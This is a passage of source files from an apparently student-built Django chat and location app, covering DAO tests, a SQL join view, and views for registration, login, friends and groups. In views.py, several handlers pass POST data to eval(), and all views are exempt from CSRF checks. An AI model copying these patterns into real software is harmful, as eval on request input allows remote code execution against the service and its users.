{\"id\":1,\"user_from_id\":self.user1['id'],\"user_to_id\":self.user2['id'],\n \"message_id\":1,\"time\":str(self.time)}\n self.immediatelyMessage2 = {\"id\":2,\"user_from_id\":self.user1['id'],\"user_to_id\":self.user2['id'],\n \"message_id\":2,\"time\":str(self.time)}\n\n User.objects.create(**self.user1)\n User.objects.create(**self.user2)\n User.objects.create(**self.user3)\n User.objects.create(**self.user4)\n\n Message.objects.create(**self.message1)\n Message.objects.create(**self.message2)\n Message.objects.create(**self.message3)\n Message.objects.create(**self.message4)\n\n TextMessage.objects.create(**self.textmessage1)\n TextMessage.objects.create(**self.textmessage2)\n TextMessage.objects.create(**self.textmessage3)\n TextMessage.objects.create(**self.textmessage4)\n\n ImmediatelyMessage.objects.create(**self.immediatelyMessage1)\n ImmediatelyMessage.objects.create(**self.immediatelyMessage2)\n\n\n def testInsertImmediatelyMessage(self):\n textmessage5 = {\"id\":5,\"content\":\"I am a txt message \"}\n textmessage = insertTextMessage(**textmessage5)\n message5 = {\"id\":5,\"time\":str(self.time),\"type\":1,\"content_id\":textmessage.id}\n message = insertMessage(**message5)\n textmessage.message_id = message.id\n textmessage.save()\n immediatelyMessage = {\"id\":3,\"user_from_id\":self.user1['id'],\"user_to_id\":self.user2['id'],\n 
\"message_id\":5,\"time\":str(self.time)}\n before = len(ImmediatelyMessage.objects.all())\n print(\"testInsertImmediatelyMessage before:\")\n print(ImmediatelyMessage.objects.all())\n insertImmediatelyMessage(**immediatelyMessage)\n after = len(ImmediatelyMessage.objects.all())\n print(\"testInsertImmediatelyMessage User1 to User2 : Message5\")\n print(ImmediatelyMessage.objects.all())\n self.assertEqual(after-before,1)\n\n def testGetImmediatelyMessageById(self):\n self.assertEqual(getImmediatelyMessageById(1).id,1)\n self.assertEqual(getImmediatelyMessageById(2).id,2)\n\n def testUpdateImmediatelyMessage(self):\n time = datetime.datetime.now()\n ### time 和 self.time 秒钟级别无差别,可试着修改user_to_id 函数可行\n print(\"testUpdateImmediatelyMessage before\")\n print(getImmediatelyMessageById(1))\n immediatelyMessage = {\"id\":1,\"user_from_id\":self.user1['id'],\"user_to_id\":self.user2['id'],\n \"message_id\":1,\"time\":str(self.time)}\n updateImmediatelyMessage(**immediatelyMessage)\n print(\"testUpdateImmediatelyMessage after:update time\")\n print(getImmediatelyMessageById(1))\n\n\n def testDeleteImmediatelyMessage(self):\n deleteImmediatelyMessage(1)\n deleteImmediatelyMessage(2)\n print(\"testDeleteImmediatelyMessage:all\")\n print(ImmediatelyMessage.objects.all())\n\n\n\n\n\n\n\n\n\n\n\n"
},
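The test above shows the three-step linking this message schema relies on: create the content row first, create the Message row pointing at it, then back-fill the content row's message_id. A minimal sketch of that pattern as a reusable helper, assuming the insertTextMessage/insertMessage signatures used in the test (the helper name itself is hypothetical):

import datetime
from adam2014.DAO.MessageDAO import insertMessage
from adam2014.DAO.TextMessageDAO import insertTextMessage

def new_text_message(content):
    # Content row first, so its id can go into Message.content_id.
    text = insertTextMessage(content=content)
    msg = insertMessage(time=str(datetime.datetime.now()),
                        type=1,  # 1 = text message, per the tests
                        content_id=text.id)
    text.message_id = msg.id  # back-link the content row to its Message
    text.save()
    return msg, text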
{
"alpha_fraction": 0.6466447710990906,
"alphanum_fraction": 0.677146852016449,
"avg_line_length": 37.76363754272461,
"blob_id": "0274611e75db88f1eaed54042b848618e36109cb",
"content_id": "2229e067bf7bfcc6cf2e547f1d02e53695967f49",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2131,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 55,
"path": "/zzc/adam2014/AllTest/DAOTest/testPictureMessageDAO.py",
"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
"text": "__author__ = 'assiso'\n# -*- coding: utf-8 -*-\n\nfrom django.test import TestCase\nfrom adam2014.DAO.PictureMessageDAO import *\nfrom adam2014.DAO.MessageDAO import *\nfrom adam2014.models import PictureMessage\nfrom adam2014.models import Message\nfrom adam2014.models import User\nimport datetime\n\nclass PictureMessageTest(TestCase):\n def setUp(self):\n self.time = datetime.datetime.now()\n self.message1 = {\"id\":1,\"time\":str(self.time),\"type\":4,\"content_id\":1}\n self.Picturemessage1 = {\"id\":1,\"content\":\"I am a Picture message \",\"message_id\":1}\n self.message2 = {\"id\":2,\"time\":str(self.time),\"type\":4,\"content_id\":2}\n self.Picturemessage2 = {\"id\":2,\"content\":\"I am a Picture message \",\"message_id\":2}\n self.message3 = {\"id\":3,\"time\":str(self.time),\"type\":4,\"content_id\":3}\n self.Picturemessage3 = {\"id\":3,\"content\":\"I am a Picture message \",\"message_id\":3}\n\n Message.objects.create(**self.message1)\n Message.objects.create(**self.message2)\n Message.objects.create(**self.message3)\n\n PictureMessage.objects.create(**self.Picturemessage1)\n PictureMessage.objects.create(**self.Picturemessage2)\n PictureMessage.objects.create(**self.Picturemessage3)\n\n def testInsertPictureMessage(self):\n PictureMessage4 = {\"id\":4,\"content\":\"I am a vioce message\"}\n PictureMessage = insertPictureMessage(**PictureMessage4)\n message4 = {\"id\":4,\"time\":str(self.time),\"type\":3,\"content_id\":PictureMessage.id}\n print(\"testInsertMessage before:\")\n message = insertMessage(**message4)\n print(Message.objects.all())\n PictureMessage.id = message.id\n\n PictureMessage.save()\n\n self.assertEqual(getPictureMessageById(4).id,4)\n\n\n def testGetPictureMessageById(self):\n self.assertEqual(getPictureMessageById(1).id,1)\n self.assertEqual(getPictureMessageById(2).id,2)\n\n\n\n def testDeletePictureMessage(self):\n deletePictureMessage(1)\n deletePictureMessage(2)\n deletePictureMessage(3)\n print(\"testDeletePictureMessage:3\")\n print(PictureMessage.objects.all())"
},
{
"alpha_fraction": 0.5526315569877625,
"alphanum_fraction": 0.6060855388641357,
"avg_line_length": 30.179487228393555,
"blob_id": "ee7eb0ee24bdba2fde2422513a4bbebaf292e2d9",
"content_id": "20b0dd279a9989c9b9e28484e45ae025ef7379e9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1216,
"license_type": "no_license",
"max_line_length": 121,
"num_lines": 39,
"path": "/zzc/adam2014/DAO/JoinDAO/User_groupDAO.py",
"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
"text": "__author__ = 'user'\n# -*- coding: utf-8 -*-\n\nimport os\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"zzc.settings\")\n\nimport django\ndjango.setup()\n\nfrom django.db import connection\nfrom adam2014.JoinModels import User_group\n\ndef getUser_groupListView(user_id):\n sql = \"select adam2014_grouprelation.id,adam2014_grouprelation.time,\" \\\n \"adam2014_group.id,adam2014_group.name,adam2014_group.ucount,adam2014_group.code,adam2014_group.creater_id\" \\\n \" from adam2014_grouprelation,adam2014_group \" \\\n \"where adam2014_grouprelation.user_id = %s and adam2014_group.id = adam2014_grouprelation.group_id ;\"\n\n cursor = connection.cursor()\n cursor.execute(sql,[user_id])\n #row = cursor.fetchone()\n row = cursor.fetchall()\n\n UGs= []\n i = 0\n for i in range(len(row)):\n UGs.append(User_group.User_group(str(row[i][0]),str(row[i][1]),\n str(row[i][2]),str(row[i][3]),str(row[i][4]),str(row[i][5]),\n str(row[i][6])))\n i+=1\n return UGs\n\n\n\n\n# user_groups = getUser_groupListView(1)\n# print(user_groups)\n# user_groups[0].printout()\n# user_groups[1].printout()\n"
},
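For reference, a hedged usage sketch of the join view above (the commented-out lines at the bottom of the file hint at the same thing); it assumes a user with id 1 exists and relies on the parameterized %s placeholder, so the id is never interpolated into the SQL by hand:

from adam2014.DAO.JoinDAO.User_groupDAO import getUser_groupListView

user_groups = getUser_groupListView(1)
for ug in user_groups:
    ug.printout()              # debug print, as in the commented example
    print(ug.object2dict())    # dict form, ready for json.dumps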
{
"alpha_fraction": 0.5912929177284241,
"alphanum_fraction": 0.6011624336242676,
"avg_line_length": 31.626117706298828,
"blob_id": "d669159839b0836c0bdc7a730edf7eb1c6956c02",
"content_id": "49a741d6c66386f17ae8eaf03869b6aa7b5fb20a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 20140,
"license_type": "no_license",
"max_line_length": 181,
"num_lines": 559,
"path": "/zzc/adam2014/views.py",
"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom django.shortcuts import render\nfrom JoinModels import FriendRelationListView\nfrom Service import AddFriendService\nfrom Service import FriendRelationService\nfrom Service import UserService\nfrom Service import GroupService\nfrom Service import GroupRelationService\nfrom Service.JoinService import FriendRelationListViewService\nfrom Service.JoinService import Group_userService\nfrom Service.JoinService import User_groupService\nfrom adam2014.IM import easemob_server_python\nfrom django.http import HttpResponse\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django import forms\nimport json\nfrom DAO import UserDAO\nfrom auth.Httpsession import*\nimport random\nimport datetime\n# Create your views here.\n\n@csrf_exempt\ndef helloworld(request):\n print request\n return render(request, 'adam2014/helloworld.html')\n\n\n@csrf_exempt\ndef register(request):\n\n # 前台接到{\"success\": 1}, 进入详细注册页面, 将所有的User信息POST到后台\n if request.method == \"POST\":\n # 获取数据\n\n # 判断手机号是否重复\n # 手机号重复, 返回{\"result\": 0, \"type\": 0}\n phone = request.POST['phone']\n if UserDAO.validateExistPhone(phone):\n # 如果手机号重复, 注册失败\n return HttpResponse(json.dumps({\"result\": 0, \"type\": 0}))\n\n password = request.POST['password']\n nickname = request.POST['nickname']\n #latitude = request.POST['latitude']\n #longitude = request.POST['longitude']\n code = int(random.uniform(100000, 999999))\n\n # 如果code存在的话,random到没有为止\n while UserDAO.validateExistCode(code):\n code = int(random.uniform(100000, 999999))\n\n # 判断value是否超过数据库最大限长\n # 长度超过限制{\"result\": 0, \"type\": 1}\n if len(nickname) > 32 or len(phone) > 11 or len(password) > 16:\n return HttpResponse(json.dumps({\"result\": 0, \"type\": \"1\"}))\n\n # 构造dict\n new_user = {\"phone\": phone, \"password\": password, \"nickname\": nickname, \"contacts_version\": \"0\",\n \"code\": code}\n\n # 插入新User\n u = UserService.newUser(**new_user)\n if u == \"error\":\n # 数据库插入失败, 返回{\"result\": 0, \"type\": 2}\n return HttpResponse(json.dumps({\"result\": 0, \"type\": 2}))\n else:\n #adam2014中user注册后,应该注册django的user\n UserRegister(code, password)\n try:\n # 环信注册\n easemob_server_python.addEasemobUser(code, code)\n except:\n # 环信注册失败\n # 环信注册失败, 返回{\"result\": 0, \"type\": 3}\n return HttpResponse(json.dumps({\"result\": 0, \"type\": 3}))\n\n # 成功, 返回{\"result\": 1, \"id\": user.id}\n return HttpResponse(json.dumps({\"result\": 1, \"id\": u.id}))\n\n\n# Author by Joe\n@csrf_exempt\ndef signin(request):\n \"\"\"\n # 前台统一两种方式登录(POST), usercode(类似于微信号) + password + type || userphone(用户的手机号) + password + type\n # POST格式: {\"phone\": \"\", \"password\": \"\", \"type\": 2}, {\"code\": \"\", \"password\": \"\", \"type\": 1}\n # type表示登录方式,1表示手机usercode登录,2表示手机号登录\n # 返回消息类型两种{success:0, type=0}(代表登录失败,原因: 用户名或密码错误)、{success:1, id:id}(登录成功)\n # {success:0, type=1}(登录失败,原因: 其他非密码错误原因) Ps: 前台需使用id,所以成功时返回id\n \"\"\"\n\n # print request\n # return HttpResponse(\"hello\")\n\n # log_type = request.POST['type']\n password = request.POST['password']\n\n # 没有密码直接返回失败\n if not password:\n return HttpResponse(json.dumps({\"result\": 0, \"type\": 0}))\n\n # 目前只有手机登录\n log_type = 2\n\n # 判断登录方式\n # Usercode登录\n if log_type == 1:\n # 获取code\n code = request.POST[\"code\"]\n\n #从自建User表中验证User信息\n exist = UserDAO.validateUserByCode(code, password)\n if exist:\n # 拉取User信息\n user = UserDAO.getUserByCode(code)\n # 登录Django自带User模块,成功返回success:1, 失败返回success:2\n \n if UserLogin(request, code, password):\n pass\n else: # 其他原因, 
例如数据库崩掉之类的\n return HttpResponse(json.dumps({\"result\": 0, \"type\": 1}))\n\n #django模块登陆成功,将当前user用户写入session,\n\n ############### 登陆并上线环信账号\n dict_user = user.toDict()\n #print(Dict_user)\n dict_user['photo'] = str(dict_user['photo'])\n dict_user['longitude']=str(dict_user['longitude'])\n dict_user['latitude']=str(dict_user['latitude'])\n\n request.session['user']=dict_user\n request.session['user_id']=user.id\n\n #json.loads将传输在网络上的json转换为python本地的dict词典对象\n #json_string = json.loads(request.session['user'])\n #print(json_string)\n #print(json_string['code'])\n\n return HttpResponse(json.dumps({\"result\": 1, \"user\":dict_user}))\n\n # 用户名或密码错误\n return HttpResponse(json.dumps({\"result\": 0, \"type\": 0}))\n\n\n # phone登录\n if log_type == 2:\n\n # 获取\n phone = request.POST[\"phone\"]\n\n exist = UserDAO.validateUserByPhone(phone, password)\n\n if exist:\n user = UserDAO.getUserByPhone(phone)\n\n # 登录Django自带User模块,成功返回 result:1, 失败返回 result:2\n if UserLogin(request, user.code, password):\n pass\n else:\n # django模块登陆失败 type: 1\n return HttpResponse(json.dumps({\"result\": 0, \"type\": 1}))\n\n\n #django模块登陆成功,将当前user用户写入session,\n\n ############### 登陆并上线环信账号\n dict_user = user.toDict()\n\n #print(Dict_user)\n # 用str转成它的文件名\n dict_user['photo'] = str(dict_user['photo'])\n # 将小数转成string,不然json放不进去\n dict_user['longitude']=str(dict_user['longitude'])\n dict_user['latitude']=str(dict_user['latitude'])\n\n request.session['user']=dict_user\n request.session['user_id']=user.id\n\n #model.toJSON,转成了string对象才能放入json传输给前台\n #print(request.session['user'])\n\n #json.loads将传输在网络上的json转换为python本地的dict词典对象\n #json_string = json.loads(request.session['user'])\n #print(json_string)\n #print(json_string['code'])\n\n\n return HttpResponse(json.dumps({\"result\": 1, \"user\": dict_user}))\n # 用户名或密码错误 type: 0\n return HttpResponse(json.dumps({\"result\": 0, \"type\": 0}))\n\n\n#退出登陆\n@csrf_exempt\ndef signout(request):\n try:\n UserLogoff(request)\n except:\n return HttpResponse(json.dumps({\"result\": 0}))\n return HttpResponse(json.dumps({\"result\": 1}))\n\n#测试session\n@csrf_exempt\ndef readSession(request):\n print(request.session['user'])\n return HttpResponse(json.dumps({\"result\": 1}))\n\n\n# 比对前后台通讯录是否一致\n# Author by Joe\n@csrf_exempt\ndef F5contact(request):\n # 前台传来用户(POST): {\"id\": \"\", \"version\": \"\"}\n # 后台返回: 1、{\"success\": 0, \"friendlist\": \"\", \"group\": \"\",}(前台后台通讯录版本不一致, 需更新前台的通讯录)\n # 2、{\"success\": 1, \"friendlist\": \"\"}(前台后台通讯录版本一致)\n\n # print request\n\n # 验证用户是否登录\n if UserVerify(request):\n\n userid = request.POST['id']\n version = request.POST['contacts_version']\n\n # 拉用户信息\n user = UserDAO.getUserById(userid)\n\n # 判断版本号是否一致\n if int(version) == int(user.contacts_version):\n # 版本号一致\n return HttpResponse(json.dumps({\"result\": 1}))\n\n else:\n # 拉取通讯录信息\n # friend = AddFriendService.getAddFriendByuser_from_id(userid)\n # groups = UserService.getuser_Groups(userid)\n groups = User_groupService.getUser_groups(userid)\n friend = FriendRelationListViewService.getFriendRelationListView(userid)\n\n # 将所有好友数据转成json\n frs = {}\n i = 0\n if friend:\n for i in range(len(friend)):\n frs[i] = friend[i].object2dict()\n i += 1\n\n # 将所有群组数据转成json\n grs = {}\n j = 0\n if groups:\n for j in range(len(friend)):\n grs[j] = groups[j].object2dict()\n j += 1\n\n print i\n return HttpResponse(json.dumps({\"result\": 0, \"type\": 1, \"friends\": frs, \"groups\": grs, \"contacts_version\": user.contacts_version, \"friend_count\": i, \"groups_count\": j}))\n else:\n return 
HttpResponse(json.dumps({\"result\": 0, \"type\": 0}))\n\n\n\n#前台登陆完接收到user对象,内有version,与客户端进行匹配,发送True请求传输新的好友列表\n@csrf_exempt\ndef getFRandGroups(request):\n if UserVerify(request):\n user_id = request.session['user_id']\n\n #loading出来的是一个列表,内部是一个个object,未序列化\n obj_Friends = FriendRelationListViewService.getFriendRelationListView(user_id)\n #创建一个数组,将object序列化为dict后放入dic_Friends,再放入json传给前台\n dic_Friends = []\n for i in range(len(obj_Friends)):\n dic_Friends.append(obj_Friends[i].object2dict())\n\n #loading出用户所有加入的小组\n obj_groups = User_groupService.getUser_groups(user_id)\n dic_Groups = []\n for i in range(len(obj_groups)):\n dic_Groups.append(obj_groups[i].object2dict())\n\n return HttpResponse(json.dumps({\"result\": 1, \"all_friends\":dic_Friends,'all_groups':dic_Groups}))\n\n return HttpResponse(json.dumps({\"result\": -1}))\n\n#获取一个好友的最新信息(存在于数据库内),地理位置\n\n#应该再写一个函数,由客户端直接请求好友客户端发送位置,好友再决定是否发送\n@csrf_exempt\ndef getPSN(request):\n if UserVerify(request):\n user_id = request.session['user_id']\n user_to_id = request.POST['user_to_id']\n obj_Friend = FriendRelationListViewService.getAfriendRelationView(user_id,user_to_id)\n dic_Friend = []\n dic_Friend.append(obj_Friend[0].object2dict())\n return HttpResponse(json.dumps({\"result\": 1, \"friend\":dic_Friend}))\n\n\n return HttpResponse(json.dumps({\"result\": -1}))\n\n#编辑用户自己的信息,这里只能修改nickname\n@csrf_exempt\ndef editinfo(request):\n if UserVerify(request):\n nickname = request.POST['nickname']\n user_id = request.session['user_id']\n user = UserService.getUserById(user_id)\n user.nickname = nickname\n user.save()\n dict_user = user.toDict()\n\n dict_user['photo'] = str(dict_user['photo'])\n dict_user['longitude']=str(dict_user['longitude'])\n dict_user['latitude']=str(dict_user['latitude'])\n\n return HttpResponse(json.dumps({\"result\": 1, \"user\":dict_user}))\n\n return HttpResponse(json.dumps({\"result\": -1}))\n\n#定义UserFrom来接收用户的头像\nclass UserForm(forms.Form):\n user_photo = forms.FileField()\n\n@csrf_exempt\ndef editphoto(request):\n if UserVerify(request):\n if request.method == \"POST\":\n uf = UserForm(request.POST,request.FILES)\n if uf.is_valid():\n #获取表单信息\n user_photo = uf.cleaned_data['user_photo']\n #修改photo名字,用时间戳生成放防止重复\n user_id = request.session['user_id']\n user = UserService.getUserById(user_id)\n\n suffix = user_photo._name.split(\".\")[1]\n # datetime.datetime.now().strftime('%Y%m%d%H%M%S')+'.'+suffix\n user_photo._name = user.code+'.'+suffix\n originfilepath = './static/upload/photo/'\n originfilepath += user_photo._name\n if os.path.isfile(originfilepath):\n os.remove(originfilepath)\n #写入数据库,并保存图片\n user.photo = user_photo\n user.save()\n dict_user = user.toDict()\n #序列化user返回给前台\n dict_user['photo'] = str(dict_user['photo'])\n dict_user['longitude']=str(dict_user['longitude'])\n dict_user['latitude']=str(dict_user['latitude'])\n return HttpResponse(json.dumps({\"result\": 1,'user':dict_user}))\n return HttpResponse(json.dumps({\"result\": -1}))\n\n# Author by Lao605\n@csrf_exempt\ndef addfriend(request):\n if UserVerify(request):\n request_user_phone = request.POST['request_user_phone']\n user = UserService.getUserByPhone(request_user_phone)\n result = 0\n if user is not None:\n result = user.code\n\n ## 想要添加的好友存在,则应该往数据库增加一条addfriend的记录\n user_from_id = request.session['user_id']\n user_to_id = user.id\n now = datetime.datetime.now()\n af = {'user_from_id':user_from_id,'user_to_id':user_to_id,'time':now}\n AddFriendService.newAddFriend(**af)\n\n ### 这里应该通知环信,用户要添加好友的消息,环信在另外的好友上线之后将添加消息推送给他\n return 
HttpResponse(json.dumps({\"result\":result,'usercode':user.code}))\n\n else:# 还没登陆\n result = -1\n\n return HttpResponse(json.dumps({\"result\":result}))\n\n\n# Author by Lao605\n@csrf_exempt\ndef confirm_addfriend(request):\n if UserVerify(request):\n confirmed = request.POST['confirmed']\n result = 0\n if confirmed == \"YES\":\n #当前应该是B用户在确认\n # 如果confirmed为YES的话就说明后面会接上那个request_user_phone\n request_user_code = request.POST['request_user_code'] # 他人的手机\n user_to = UserService.getUserByCode(request_user_code)\n user_to_id = user_to.id\n\n user_from = request.session['user']\n user_from_id = user_from['id']\n time = datetime.datetime.now()\n inBlackList = False\n remark = \" \"\n top = False\n new_relation = {\"user_from_id\":user_from_id,\"user_to_id\":user_to_id,\"time\":time,\"inBlackList\":inBlackList,\"remark\":remark,\"top\":top}\n # result1是暂时存放结果的\n result1 = FriendRelationService.newFriendRelation(**new_relation)\n ##新增好友后A、B两个用户的version都应该加一\n user_A = UserService.getUserById(user_from_id)\n user_B = UserService.getUserById(user_to_id)\n user_A.contacts_version=user_A.contacts_version+1\n user_B.contacts_version=user_B.contacts_version+1\n user_A.save()\n user_B.save()\n\n if result1 is \"error\":\n result = 0\n else:\n # 返回的是FriendRelation对象\n result = 1\n if confirmed == \"NO\":\n # 如果confirmed为NO的话就这样结束了,不用去检查request_user_phone等数据\n result = 3\n else:\n # 还没登陆\n result = 2\n\n return HttpResponse(json.dumps({\"success\":result}))\n\n\n@csrf_exempt\ndef invitefriend(request):\n json_string = eval(request.POST[\"data\"])\n phonenum = json_string[\"phonenum\"]\n\n result = {\n \"success\":1,\n }\n return HttpResponse(json.dumps(result))\n\n@csrf_exempt\ndef updatePSN(request):\n if UserVerify(request):\n json_string = eval(request.POST['data'])\n latitude = json_string['latitude']\n longitude =json_string['longitude']\n user_id = request.session['user_id']\n user = UserService.getUserById(user_id)\n user.longitude = longitude\n user.latitude = latitude\n user.save()\n return HttpResponse(json.dumps({\"result\":1}))\n\n return HttpResponse(json.dumps({\"result\":-1}))\n\n\n@csrf_exempt\ndef setfriend(request):\n if UserVerify(request):\n json_string = eval(request.POST[\"data\"])\n user_to_id = json_string['user_to_id']\n inBlackList = json_string['inBlackList']\n remark = json_string['remark']\n top = json_string['top']\n user_from_id = request.session['user_id']\n\n if len(remark) > 32:\n return HttpResponse(json.dumps({\"result\": 0}))\n\n fr = FriendRelationService.getFriendRelationByCondition(user_from_id,user_to_id)\n fr.inBlackList = inBlackList\n fr.remark = remark\n fr.top = top\n fr.save()\n\n return HttpResponse(json.dumps({\"result\":1}))\n\n return HttpResponse(json.dumps({\"result\":-1}))\n\n\n#用户登录状态的test\n# def test1(request):\n# UserId = eval(request.GET['UserId'])\n# PassWord = eval(request.GET['PassWord'])\n# str = UserRegister(UserId,PassWord)\n# return HttpResponse(str)\n# def test2(request):\n# str = UserLogin(request)\n# return HttpResponse(str)\n# def test3(request):\n# if UserVerify(request):\n# return HttpResponse(\"is login\")\n# else:\n# return HttpResponse(\"isn't login\")\n# def test4(request):\n# str = UserLogoff(request)\n# return HttpResponse(str)\n\n@csrf_exempt\ndef addUserToGroup(request):\n if UserVerify(request):\n new_group_user_id = request.POST['new_group_user_id']\n group_id = request.POST['group_id']\n time = datetime.datetime.now()\n gr = {'user_id':new_group_user_id,'group_id':group_id,'time':time}\n 
GroupRelationService.newGroupRelation(**gr)\n new_group_user = UserService.getUserById(new_group_user_id)\n new_group_user.contacts_version = new_group_user.contacts_version+1\n new_group_user.save()\n return HttpResponse(json.dumps({\"result\":1}))\n\n return HttpResponse(json.dumps({\"result\":-1}))\n\n@csrf_exempt\ndef deleteUserToGroup(request):\n if UserVerify(request):\n user_id = request.session['user_id']\n group_id = request.POST['group_id']\n GroupRelationService.deleteGroupRelationByCondition(user_id,group_id)\n\n user = UserService.getUserById(user_id)\n user.contacts_version = user.contacts_version+1\n user.save()\n return HttpResponse(json.dumps({\"result\":1}))\n\n return HttpResponse(json.dumps({\"result\":-1}))\n\n@csrf_exempt\ndef deleteFriendRelation(request):\n if UserVerify(request):\n user_id = request.session['user_id']\n user_to_id = request.POST['user_to_id']\n FriendRelationService.deleteFriendRelation(user_id,user_to_id)\n\n user = UserService.getUserById(user_id)\n user.contacts_version = user.contacts_version+1\n user.save()\n return HttpResponse(json.dumps({\"result\":1}))\n\n return HttpResponse(json.dumps({\"result\":-1}))\n\n@csrf_exempt\ndef newAgroup(request):\n if UserVerify(request):\n user_id = request.session['user_id']\n name = request.POST['name']\n code = int(random.uniform(100000, 999999))\n group = {'name':name,'ucount':1,'code':code,'creater_id':user_id}\n new_group = GroupService.newGroup(**group)\n group_id = new_group.id\n time =datetime.datetime.now()\n gr = {'group_id':group_id,'user_id':user_id,'time':time}\n new_group = GroupRelationService.newGroupRelation(**gr)\n dic_group = new_group.toDict()\n user = UserService.getUserById(user_id)\n user.contacts_version = user.contacts_version+1\n user.save()\n return HttpResponse(json.dumps({\"result\":1,'new_group':dic_group}))\n\n return HttpResponse(json.dumps({\"result\":-1}))\n"
},
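Most handlers above share one contract: form-encoded POST in, a {"result": ...} JSON body out. A minimal sketch of exercising the phone-login path with Django's test client, assuming a user with these placeholder credentials already exists in the test database (URL prefix per zzc/urls.py):

import json
from django.test import Client

c = Client()
resp = c.post('/adam2014/signin', {'phone': '13570517278', 'password': '7654321'})
data = json.loads(resp.content)
if data['result'] == 1:
    print(data['user']['nickname'])  # the serialized user dict that also went into the session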
{
"alpha_fraction": 0.741679847240448,
"alphanum_fraction": 0.741679847240448,
"avg_line_length": 38.5,
"blob_id": "6f9e160e173846e52684d7463dd8f885f19b29be",
"content_id": "726043eb88bcacb96021d0e1629dba5539d6546c",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 631,
"license_type": "permissive",
"max_line_length": 67,
"num_lines": 16,
"path": "/zzc/Distance/js/position.js",
"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
"text": "var closePosotiondiv = function() {\n\tdocument.getElementById(\"showPositonMsg\").style.display = \"none\";\n\tdocument.getElementById(\"Positionmarkdiv\").style.display = \"none\";\n}\nvar showPosotiondiv = function() {\n\tdocument.getElementById(\"showPositonMsg\").style.display = \"\";\n\tdocument.getElementById(\"Positionmarkdiv\").style.display = \"\";\n}\nvar tochatdiv = function() {\n\tdocument.getElementById(\"container\").style.display = \"none\";\n\tdocument.getElementById(\"slider\").style.display = \"\";\n}\nvar toMapdiv = function() {\n\tdocument.getElementById(\"container\").style.display = \"\";\n\tdocument.getElementById(\"slider\").style.display = \"none\";\n}"
},
{
"alpha_fraction": 0.5753755569458008,
"alphanum_fraction": 0.6196351647377014,
"avg_line_length": 41.375,
"blob_id": "955c901b2381cf02f31bd3350910970a5314fa1b",
"content_id": "4c6dca393f795afb1aebfc386112bb51adfd7c8a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3842,
"license_type": "no_license",
"max_line_length": 121,
"num_lines": 88,
"path": "/zzc/adam2014/JoinModels/__init__.py",
"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
"text": "__author__ = 'CF'\n# -*- coding: utf-8 -*-\n\nfrom django.test import TestCase\nfrom adam2014.Service.FriendRelationService import *\nfrom adam2014.models import User\nfrom adam2014.models import AddFriend\nfrom adam2014.models import FriendRelation\nimport datetime\nimport django.db.transaction\n\nclass UserServiceTest(TestCase):\n def setUp(self):\n #构造user\n self.user = {\"id\":1,\"password\":\"7654321\",\"nickname\":\"frank\",\"photo\":\"this is a photo\",\"phone\":\"13570517278\",\n \"contacts_version\":\"1.0\",\"longitude\":\"1.23\",\"latitude\":\"23.45\",\"code\":\"111111111\"}\n self.user2 = {\"id\":2,\"password\":\"1234567\",\"nickname\":\"frank2\",\"photo\":\"this is a photo\",\"phone\":\"13570517279\",\n \"contacts_version\":\"1.0\",\"longitude\":\"1.23\",\"latitude\":\"23.45\",\"code\":\"111111112\"}\n self.user3 = {\"id\":3,\"password\":\"1234567\",\"nickname\":\"frank2\",\"photo\":\"this is a photo\",\"phone\":\"13570517279\",\n \"contacts_version\":\"1.0\",\"longitude\":\"1.23\",\"latitude\":\"23.45\",\"code\":\"111111113\"}\n User.objects.create(**self.user)\n User.objects.create(**self.user2)\n User.objects.create(**self.user3)\n\n self.time = datetime.datetime.now()\n self.inBlackList = False;\n self.top = False;\n\n # 构造好友关系\n self.addfriend1 = {\"id\":1,\"user_from_id\":1,\"user_to_id\":2,\"time\":str(self.time)}\n self.addfriend2 = {\"id\":2,\"user_from_id\":1,\"user_to_id\":3,\"time\":str(self.time)}\n self.addfriend3 = {\"id\":3,\"user_from_id\":1,\"user_to_id\":4,\"time\":str(self.time)}\n self.addfriend4 = {\"id\":4,\"user_from_id\":2,\"user_to_id\":3,\"time\":str(self.time)}\n\n AddFriend.objects.create(**self.addfriend1)\n AddFriend.objects.create(**self.addfriend2)\n AddFriend.objects.create(**self.addfriend3)\n AddFriend.objects.create(**self.addfriend4)\n\n self.friendRelation1 = {\"id\":1,\"user_from_id\":1,\"user_to_id\":2,\"time\":str(self.time),\"remark\":\"God Kun\",\n \"inBlackList\":self.inBlackList,\"top\":self.top}\n self.friendRelation2 = {\"id\":2,\"user_from_id\":2,\"user_to_id\":1,\"time\":str(self.time),\"remark\":\"God Kun\",\n \"inBlackList\":self.inBlackList,\"top\":self.top}\n self.friendRelation3 = {\"id\":3,\"user_from_id\":2,\"user_to_id\":3,\"time\":str(self.time),\"remark\":\"God Kun\",\n \"inBlackList\":self.inBlackList,\"top\":self.top}\n self.friendRelation4 = {\"id\":4,\"user_from_id\":2,\"user_to_id\":4,\"time\":str(self.time),\"remark\":\"God Kun\",\n \"inBlackList\":self.inBlackList,\"top\":self.top}\n\n # FriendRelation.objects.create(**self.friendRelation1)\n FriendRelation.objects.create(**self.friendRelation2)\n FriendRelation.objects.create(**self.friendRelation3)\n FriendRelation.objects.create(**self.friendRelation4)\n\n\n def testNewRelation(self):\n\n # 错误情况:2和4不是好友,此时插入关系service会返回error值\n #print newRelation(**self.friendRelation4)\n\n # 正确情况:1和2是好友 (插入时,不能create relation否则数据库会报重复插入错误)\n print newRelation(**self.friendRelation1)\n\n def testGetRelation(self):\n\n print getRelation(2)\n\n def testDelteRelation(self):\n\n print \"test delete relation\"\n print \"before test start\"\n print len(FriendRelation.objects.all())\n\n deleteRelation(2)\n\n print \"after test start\"\n print len(FriendRelation.objects.all())\n\n def 